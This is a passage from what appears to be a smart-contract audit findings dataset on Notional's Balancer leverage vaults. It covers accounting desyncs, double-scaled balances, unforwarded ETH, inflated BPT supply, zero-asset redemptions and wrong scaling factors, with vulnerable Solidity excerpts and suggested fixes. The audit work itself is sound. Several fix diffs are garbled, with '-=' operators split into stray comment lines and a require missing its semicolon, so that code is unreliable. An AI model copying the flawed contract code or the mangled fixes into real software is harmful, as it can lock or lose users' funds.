`strategyTokens` are redeemed and `bptClaim` is zero, the `_redeem` function will exit at Line 441 immediately. Thus, the redeemed strategy tokens are not deducted from the `strategyContext.vaultState.totalStrategyTokenGlobal` accounting variable on the Vault side.\\nThus, `strategyContext.vaultState.totalStrategyTokenGlobal` on the Vault side will not be in sync with the `vaultState.totalStrategyTokens` on the Notional side.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\nчThe number of strategy tokens redeemed needs to be deducted from the vault's `totalStrategyTokenGlobal` regardless of the `bptClaim` value. Otherwise, the vault's `totalStrategyTokenGlobal` will not be in sync.\\nWhen `bptClaim` is zero, it does not always mean that no strategy token has been redeemed. Based on the current vault implementation, the `bptClaim` might be zero because the number of strategy tokens to be redeemed is too small and thus it causes Solidity to round down to zero.\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n// Add the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n// Add the line below\\n strategyContext.vaultState.setStrategyVaultState();\\n// Add the line below\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n// Remove the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчThe `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault. This means that the actual total strategy tokens in circulation and the `strategyContext.vaultState.totalStrategyTokenGlobal` will be different. The longer the issue is left unfixed, the larger the differences between them.\\nThe `strategyContext.vaultState.totalStrategyTokenGlobal` will be larger than expected because it does not deduct the number of strategy tokens when it should be under certain conditions.\\nOne example of the impact is as follows: The affected variable is used within the `_convertStrategyTokensToBPTClaim` and `_convertBPTClaimToStrategyTokens`, `_getBPTHeldInMaturity` functions. These functions are used within the deposit and redeem functions of the vault. Therefore, the number of strategy tokens or assets the users receive will not be accurate and might be less or more than expected.ч```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n -Token amounts are scaled up twice causing the amounts to be inflated in two token vaultчhighчToken amounts are scaled up twice causing the amounts to be inflated in two token vault when performing computation. This in turn causes the reinvest function to break leading to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.\\nIn Line 121-124, the `primaryAmount` and `secondaryAmount` are scaled up to `BALANCER_PRECISION` (1e18). The reason for doing so is that balancer math functions expect all amounts to be in `BALANCER_PRECISION` (1e18).\\nThen, the scaled `primaryAmount` and `secondaryAmount` are passed into the `_getSpotPrice` function at Line 126.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n\\nWithin the `_getSpotPrice` function, the `primaryBalance` and `secondaryBalance` are scaled up again at Line 25 - 28. As such, any token (e.g. USDC) with a decimal of less than `BALANCER_PRECISION` (1e18) will be scaled up twice. This will cause the `balanceX` or `balanceY` to be inflated.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nBalancer's Scaling Factors\\nIt is important to know the underlying mechanism of scaling factors within Balancer to understand this issue.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in 1e18. Thus, before passing the token balances to the stable math functions, all the balances need to be normalized to 18 decimals.\\nFor instance, assume that 100 USDC needs to be passed into the stable math functions for some computation. 100 USDC is equal to `100e6` since the decimals of USDC is `6`. To normalize it to 18 decimals, 100 USDC (100e6) will be multiplied by its scaling factor (1e12), and the result will be `100e18`.\\nThe following code taken from Balancer shows that the scaling factor is comprised of the scaling factor multiplied by the token rate. The scaling factor is the value needed to normalize the token balance to 18 decimals.\\n```\\n /**\\n * @dev Overrides scaling factor getter to introduce the tokens' price rate.\\n * Note that it may update the price rate cache if necessary.\\n */\\n function _scalingFactors() internal view virtual override returns (uint256[] memory scalingFactors) {\\n // There is no need to check the arrays length since both are based on `_getTotalTokens`\\n // Given there is no generic direction for this rounding, it simply follows the same strategy as the BasePool.\\n scalingFactors = super._scalingFactors();\\n scalingFactors[0] = scalingFactors[0].mulDown(_priceRate(_token0));\\n scalingFactors[1] = scalingFactors[1].mulDown(_priceRate(_token1));\\n }\\n```\\n\\nAnother point to note is that Balancer's stable math functions perform calculations in fixed point format. Therefore, the scaling factor will consist of the `FixedPoint.ONE` (1e18) multiplied by the value needed to normalize the token balance to 18 decimals. If it is a USDC with 6 decimals, the scaling factor will be 1e30:\\n```\\nFixedPoint.ONE * 10**decimalsDifference\\n1e18 * 1e12 = 1e30\\n```\\n\\n```\\n /**\\n * @dev Returns a scaling factor that, when multiplied to a token amount for `token`, normalizes its balance as if\\n * it had 18 decimals.\\n */\\n function _computeScalingFactor(IERC20 token) internal view returns (uint256) {\\n // Tokens that don't implement the `decimals` method are not supported.\\n uint256 tokenDecimals = ERC20(address(token)).decimals();\\n\\n // Tokens with more than 18 decimals are not supported.\\n uint256 decimalsDifference = Math.sub(18, tokenDecimals);\\n return FixedPoint.ONE * 10**decimalsDifference;\\n }\\n```\\n\\nProof-of-Concept\\nAssume that one of the tokens in Notional's two token leverage vault has a decimal of less than 18. Let's take USDC as an example.\\n100 USDC (1e6) is passed into the `_validateSpotPriceAndPairPrice` function as the `primaryAmount`. In Line 121-124 of the `_validateSpotPriceAndPairPrice` function, the `primaryAmount` will be scaled up to `BALANCER_PRECISION` (1e18).\\n`primaryAmount` = `primaryAmount` * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n`primaryAmount` = 100e6 * 1e18 / 1e6\\n`primaryAmount` = 100e18\\nWithin the `_getSpotPrice` function, the `primaryBalance` is scaled up again at Line 25 - 28 of the `_getSpotPrice` function.\\n`scaledPrimaryBalance = `primaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\nscaledPrimaryBalance = 100e18 * 1e30 / 1e18\\nscaledPrimaryBalance = 1e30\\nscaledPrimaryBalance = 1000000000000e18`\\nAs shown above, normalized 100 USDC (100e18) ended up becoming normalized 1000000000000 USDC (1000000000000e18). Therefore, the stable math functions are computed with an inflated balance of 1000000000000 USDC instead of 100 USDC.чSince the token balances are already normalized to 18 decimals within the `_getSpotPrice` function, the code to normalize the token balances in the `_validateSpotPriceAndPairPrice` function can be removed.\\n```\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n// Remove the line below\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Remove the line below\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n// Remove the line below\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check the calculated primary/secondary price against the oracle price\\n /// to make sure that we are joining the pool proportionally\\n _checkPriceLimit(strategyContext, oraclePrice, calculatedPairPrice);\\n }\\n```\\nчThe spot price computed by the `Stable2TokenOracleMath._getSpotPrice` function will deviate from the actual price because inflated balances were passed into it. The deviated spot price will then be passed to the `_checkPriceLimit` function to verify if the spot price has deviated from the oracle price. The check will fail and cause a revert. This will in turn cause the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function to revert.\\nTherefore, any function that relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function will be affected. It was found that the `MetaStable2TokenAuraHelper.reinvestReward` relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function. As such, reinvest feature of the vault will be broken and the vault will not be able to reinvest its rewards.\\nThis in turn led to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.ч```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n -`msgValue` will not be populated if ETH is the secondary tokenчhighч`msgValue` will not be populated if ETH is the secondary token in the two token leverage vault, leading to a loss of assets as the ETH is not forwarded to the Balancer Pool during a trade.\\nBased on the source code of the two token pool leverage vault, it is possible to deploy a vault to support a Balancer pool with an arbitrary token as the primary token and ETH as the secondary token. The primary token is always the borrowing currency in the vault.\\nHowever, Line 60 of `TwoTokenPoolUtils._getPoolParams` function below assumes that if one of the two tokens is ETH in the pool, it will always be the primary token or borrowing currency, which is not always the case. If the ETH is set as the secondary token, the `msgValue` will not be populated.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n\\nAs a result, when the caller joins the Balancer pool, the `params.msgValue` will be empty, and no secondary token (ETH) will be forwarded to the Balancer pool. The ETH will remain stuck in the vault and the caller will receive much fewer BPT tokens in return.\\n```\\nFile: BalancerUtils.sol\\n /// @notice Joins a balancer pool using exact tokens in\\n function _joinPoolExactTokensIn(\\n PoolContext memory context,\\n PoolParams memory params,\\n uint256 minBPT\\n ) internal returns (uint256 bptAmount) {\\n bptAmount = IERC20(address(context.pool)).balanceOf(address(this));\\n Deployments.BALANCER_VAULT.joinPool{value: params.msgValue}(\\n context.poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n params.assets,\\n params.amounts,\\n abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n params.amounts,\\n minBPT // Apply minBPT to prevent front running\\n ),\\n false // Don't use internal balances\\n )\\n );\\n bptAmount =\\n IERC20(address(context.pool)).balanceOf(address(this)) -\\n bptAmount;\\n }\\n```\\nчConsider populating the `msgValue` if the secondary token is ETH.\\n```\\n/// @notice Returns parameters for joining and exiting Balancer pools\\nfunction _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n// Add the line below\\n if (isJoin && assets[context.secondaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n// Add the line below\\n msgValue = amounts[context.secondaryIndex];\\n// Add the line below\\n }\\n \\n return PoolParams(assets, amounts, msgValue);\\n}\\n```\\nчLoss of assets for the callers as ETH will remain stuck in the vault and not forwarded to the Balancer Pool. Since the secondary token (ETH) is not forwarded to the Balancer pool, the caller will receive much fewer BPT tokens in return when joining the pool.\\nThis issue affects the deposit and reinvest reward functions of the vault, which means that the depositor will receive fewer strategy tokens in return during depositing, and the vault will receive less BPT in return during reinvesting.ч```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Returns parameters for joining and exiting Balancer pools\\n function _getPoolParams(\\n TwoTokenPoolContext memory context,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isJoin\\n ) internal pure returns (PoolParams memory) {\\n IAsset[] memory assets = new IAsset[](2);\\n assets[context.primaryIndex] = IAsset(context.primaryToken);\\n assets[context.secondaryIndex] = IAsset(context.secondaryToken);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[context.primaryIndex] = primaryAmount;\\n amounts[context.secondaryIndex] = secondaryAmount;\\n\\n uint256 msgValue;\\n if (isJoin && assets[context.primaryIndex] == IAsset(Deployments.ETH_ADDRESS)) {\\n msgValue = amounts[context.primaryIndex];\\n }\\n\\n return PoolParams(assets, amounts, msgValue);\\n }\\n```\\n -`totalBPTSupply` will be excessively inflatedчhighчThe `totalBPTSupply` will be excessively inflated as `totalSupply` was used instead of `virtualSupply`. This might cause a boosted balancer leverage vault not to be emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, thus having problems exiting its position.\\nBalancer's Boosted Pool uses Phantom BPT where all pool tokens are minted at the time of pool creation and are held by the pool itself. Therefore, `virtualSupply` should be used instead of `totalSupply` to determine the amount of BPT supply in circulation.\\nHowever, within the `Boosted3TokenAuraVault.getEmergencySettlementBPTAmount` function, the `totalBPTSupply` at Line 169 is derived from the `totalSupply` instead of the `virtualSupply`. As a result, `totalBPTSupply` will be excessively inflated (2**(111)).\\n```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n\\nAs a result, the `emergencyBPTWithdrawThreshold` threshold will be extremely high. As such, the condition at Line 97 will always be evaluated as true and result in a revert.\\n```\\nFile: SettlementUtils.sol\\n function _getEmergencySettlementParams(\\n StrategyContext memory strategyContext,\\n uint256 maturity,\\n uint256 totalBPTSupply\\n ) internal view returns(uint256 bptToSettle) {\\n StrategyVaultSettings memory settings = strategyContext.vaultSettings;\\n StrategyVaultState memory state = strategyContext.vaultState;\\n\\n // Not in settlement window, check if BPT held is greater than maxBalancerPoolShare * total BPT supply\\n uint256 emergencyBPTWithdrawThreshold = settings._bptThreshold(totalBPTSupply);\\n\\n if (strategyContext.vaultState.totalBPTHeld <= emergencyBPTWithdrawThreshold)\\n revert Errors.InvalidEmergencySettlement();\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply)\\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\nчUpdate the function to compute the `totalBPTSupply` from the virtual supply.\\n```\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n// Remove the line below\\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n// Add the line below\\n totalBPTSupply: context.poolContext._getVirtualSupply(context.oracleContext)\\n });\\n }\\n```\\nчAnyone (e.g. off-chain keeper or bot) that relies on the `SettlementUtils.getEmergencySettlementBPTAmount` to determine if an emergency settlement is needed would be affected. The caller will presume that since the function reverts, emergency settlement is not required and the BPT threshold is still within the healthy level. The caller will wrongly decided not to perform an emergency settlement on a vault that has already exceeded the BPT threshold.\\nIf a boosted balancer leverage vault is not emergency settled in a timely manner and holds too large of a share of the liquidity within the pool, it will have problems exiting its position.ч```\\nFile: Boosted3TokenAuraVault.sol\\n function getEmergencySettlementBPTAmount(uint256 maturity) external view returns (uint256 bptToSettle) {\\n Boosted3TokenAuraStrategyContext memory context = _strategyContext();\\n bptToSettle = context.baseStrategy._getEmergencySettlementParams({\\n maturity: maturity, \\n totalBPTSupply: IERC20(context.poolContext.basePool.basePool.pool).totalSupply()\\n });\\n }\\n```\\n -Users redeem strategy tokens but receives no assets in returnчhighчDue to a rounding error in Solidity, it is possible that a user burns their strategy tokens, but receives no assets in return due to issues in the following functions:\\nStrategyUtils._convertStrategyTokensToBPTClaim\\nBoosted3TokenPoolUtils._redeem\\nTwoTokenPoolUtils._redeem\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertStrategyTokensToBPTClaim` function, it was observed that if the numerator is smaller than the denominator, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nWhen the `bptClaim` is zero, the function returns zero instead of reverting. Therefore, it is possible that a user redeems (\"burns\") their strategy tokens, but receives no assets in return because the number of strategy tokens redeemed by the user is too small.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\nчConsider reverting if the assets (bptClaim) received is zero. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n// Remove the line below\\n if (bptClaim == 0) return 0;\\n// Add the line below\\n require(bptClaim > 0, \"zero asset\")\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчLoss of assets for the users as they burn their strategy tokens, but receive no assets in return.ч```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n -Scaling factor of the wrapped token is incorrectчhighчThe scaling factor of the wrapped token within the Boosted3Token leverage vault is incorrect. Thus, all the computations within the leverage vault will be incorrect. This leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.\\nIn Line 120, it calls the `getScalingFactors` function of the LinearPool to fetch the scaling factors of the LinearPool.\\nIn Line 123, it computes the final scaling factor of the wrapped token by multiplying the main token's decimal scaling factor with the wrapped token rate, which is incorrect.\\n```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n\\nThe correct way of calculating the final scaling factor of the wrapped token is to multiply the wrapped token's decimal scaling factor by the wrapped token rate as shown below:\\n```\\nscalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n```\\n\\nThe `_scalingFactorWrappedToken` is the scaling factor that, when multiplied to a token amount, normalizes its balance as if it had 18 decimals. The `_getWrappedTokenRate` function returns the wrapped token rate.\\nIt is important to note that the decimal scaling factor of the main and wrapped tokens are not always the same. Thus, they cannot be used interchangeably.\\n```\\n // Scaling factors\\n\\n function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {\\n if (token == _mainToken) {\\n return _scalingFactorMainToken;\\n } else if (token == _wrappedToken) {\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token\\n // increases in value.\\n return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n } else if (token == this) {\\n return FixedPoint.ONE;\\n } else {\\n _revert(Errors.INVALID_TOKEN);\\n }\\n }\\n\\n /**\\n * @notice Return the scaling factors for all tokens, including the BPT.\\n */\\n function getScalingFactors() public view virtual override returns (uint256[] memory) {\\n uint256[] memory scalingFactors = new uint256[](_TOTAL_TOKENS);\\n\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n scalingFactors[_mainIndex] = _scalingFactorMainToken;\\n scalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n scalingFactors[_BPT_INDEX] = FixedPoint.ONE;\\n\\n return scalingFactors;\\n }\\n```\\nчThere is no need to manually calculate the final scaling factor of the wrapped token again within the code. This is because the wrapped token scaling factor returned by the `LinearPool.getScalingFactors()` function already includes the token rate. Refer to the Balancer's source code above for referen\\n```\\nfunction _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n// Remove the line 